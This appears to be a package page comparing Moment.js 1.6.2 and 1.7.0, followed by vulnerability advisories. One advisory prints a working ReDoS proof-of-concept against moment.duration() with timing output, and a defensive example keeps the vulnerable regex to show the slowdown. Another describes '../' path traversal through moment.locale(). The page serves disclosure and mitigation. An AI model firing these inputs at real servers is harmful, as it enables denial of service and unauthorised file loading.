Moment.js saw a significant update between versions 1.6.2 and 1.7.0, offering developers an enhanced experience for date manipulation in JavaScript. Version 1.7.0, released in July 2012, built upon the foundation laid by its predecessor, 1.6.2, launched in May 2012. Both versions, authored by Tim Wood, aimed to simplify date handling without extending the native Date prototype.
One notable change is in the package's description itself. Version 1.6.2 highlighted Moment.js as a library that "helps create, manipulate, and format dates," while 1.7.0 succinctly described it as a tool to "Parse, manipulate, and display dates." This subtle shift might indicate a greater emphasis on parsing capabilities in the newer release.
While both versions share the same development dependencies (JSHint, Nodeunit and UglifyJS), the dependencies section differs. Version 1.6.2 explicitly declares empty dependencies and optionalDependencies fields, underlining its standalone nature. Version 1.7.0 omits these fields entirely; for npm an absent dependencies field means the same as an empty one, so neither version pulls in runtime dependencies. Developers upgrading should still confirm that nothing in their build or lockfile relied on those fields being present.
The core functionality, accessible via the GitHub repository, remained consistent: both versions list the same author and repository URL, and both are distributed through npm as tarballs. For developers already using Moment.js, upgrading to version 1.7.0 should be accompanied by testing to confirm compatibility with any new parsing or display features.
Known vulnerabilities affecting version 1.7.0 of the package (1.7.0 falls inside every affected range listed below)
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration(). The following proof of concept feeds ever-longer strings of the form "-111...1" to moment.duration() and times each call:
    // PoC: time moment.duration() on ever-longer "-111...1" inputs.
    // On a vulnerable version the elapsed time grows quadratically with the length.
    var moment = require('moment');
    // Build a string of `len` + 1 copies of `chr` (the loop bound is inclusive).
    var genstr = function (len, chr) {
        var result = "";
        for (var i = 0; i <= len; i++) {
            result = result + chr;
        }
        return result;
    };
    for (var n = 20000; n <= 10000000; n = n + 10000) {
        console.log("COUNT: " + n);
        var str = '-' + genstr(n, '1');   // leading '-' plus n + 1 digits, nothing else to match
        console.log("LENGTH: " + str.length);
        var start = process.hrtime();
        moment.duration(str);             // the duration regex backtracks across the whole string
        var end = process.hrtime(start);  // [seconds, nanoseconds] spent in moment.duration()
        console.log(end);
    }
Sample output against a vulnerable version (each timing is [seconds, nanoseconds]; the elapsed time grows roughly with the square of the string length, about 9x from 20,000 to 60,000 characters):
    $ node moment.js
    COUNT: 20000
    LENGTH: 20002
    [ 0, 618931029 ]
    COUNT: 30001
    LENGTH: 30003
    [ 1, 401413894 ]
    COUNT: 40002
    LENGTH: 40004
    [ 2, 437075303 ]
    COUNT: 50003
    LENGTH: 50005
    [ 3, 824664804 ]
    COUNT: 60004
    LENGTH: 60006
    [ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment (prior to 2.19.3) are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
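Both ReDoS advisories above (the duration parser fixed in 2.11.2 and the date-string parser fixed in 2.19.3) have the same practical mitigation when an upgrade is not immediately possible: bound the length of untrusted input and pre-validate it with an anchored pattern that cannot backtrack, before the string ever reaches moment. The following is an added example written for this page, not moment's own code. The `UNANCHORED` pattern is modelled on the shape of the ASP.NET-style duration matcher moment used before 2.11.2 (reproduced from memory; treat the exact pattern as an assumption, used only to show the blow-up), the 64-character limit is an assumed bound on legitimate input, and `guardedDuration` takes the real parser as a callback so the example runs without moment installed.

```javascript
// Added example: gate untrusted strings before they reach moment.duration() or
// moment(). Not moment's own code.
'use strict';

// Assumption: no legitimate duration or date string from a client exceeds this.
const MAX_INPUT_LENGTH = 64;

// Shape of the pre-2.11.2 duration matcher (assumption, from memory): unanchored,
// so on "-111...1" (no ':') every start position re-scans all digits -> O(n^2).
const UNANCHORED = /(\-)?(?:(\d*)\.)?(\d+)\:(\d+)(?:\:(\d+)\.?(\d{3})?)?/;

// Anchored and bounded: every quantifier has a small upper bound and the whole
// string must match, so a non-matching input fails in time linear in its length.
const ASPNET_DURATION = /^(-)?(?:(\d{1,9})\.)?(\d{1,9}):(\d{1,9})(?::(\d{1,9})(?:\.(\d{1,3}))?)?$/;
const ISO_DURATION = /^[-+]?P(?:\d{1,9}Y)?(?:\d{1,9}M)?(?:\d{1,9}W)?(?:\d{1,9}D)?(?:T(?:\d{1,9}H)?(?:\d{1,9}M)?(?:\d{1,9}(?:\.\d{1,9})?S)?)?$/;

// True only for strings that are short and match one of the anchored formats.
function isSafeDurationInput(s) {
  if (typeof s !== 'string' || s.length > MAX_INPUT_LENGTH) return false;
  return ASPNET_DURATION.test(s) || ISO_DURATION.test(s);
}

// Wrap the real parser: in an application `parse` would be moment.duration.
function guardedDuration(s, parse) {
  if (!isSafeDurationInput(s)) {
    throw new RangeError('rejected duration input (length or format)');
  }
  return parse(s);
}

// Same input shape as the advisory's PoC: '-' followed by n ones.
function attackString(n) {
  return '-' + '1'.repeat(n);
}

// Milliseconds spent running `re.test(s)` once.
function timeRegex(re, s) {
  const start = process.hrtime.bigint();
  re.test(s);
  return Number(process.hrtime.bigint() - start) / 1e6;
}

function demo() {
  for (const n of [1000, 2000, 4000]) {
    const s = attackString(n);
    console.log(`n=${n} unanchored=${timeRegex(UNANCHORED, s).toFixed(2)}ms ` +
                `anchored=${timeRegex(ASPNET_DURATION, s).toFixed(2)}ms ` +
                `accepted=${isSafeDurationInput(s)}`);
  }
  // Legitimate inputs still reach the parser (identity stands in for moment.duration).
  console.log(guardedDuration('7.23:59:59.999', (x) => x));
  console.log(guardedDuration('P1DT2H', (x) => x));
}

demo();
```

In an application the call becomes `guardedDuration(req.query.d, moment.duration)`; the length cap alone already defeats the PoC above, and the anchored patterns keep the pre-check itself from becoming a new ReDoS sink.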
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string (e.g. fr) is passed directly to moment.locale() to switch the locale. The locale name is used to build the path of the locale module that moment loads, so a name containing '../' segments (as in the advisory title) resolves to a file outside the locale directory.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Workaround: sanitize the user-provided locale name (for example, check it against an allowlist of locale names) before passing it to moment.js.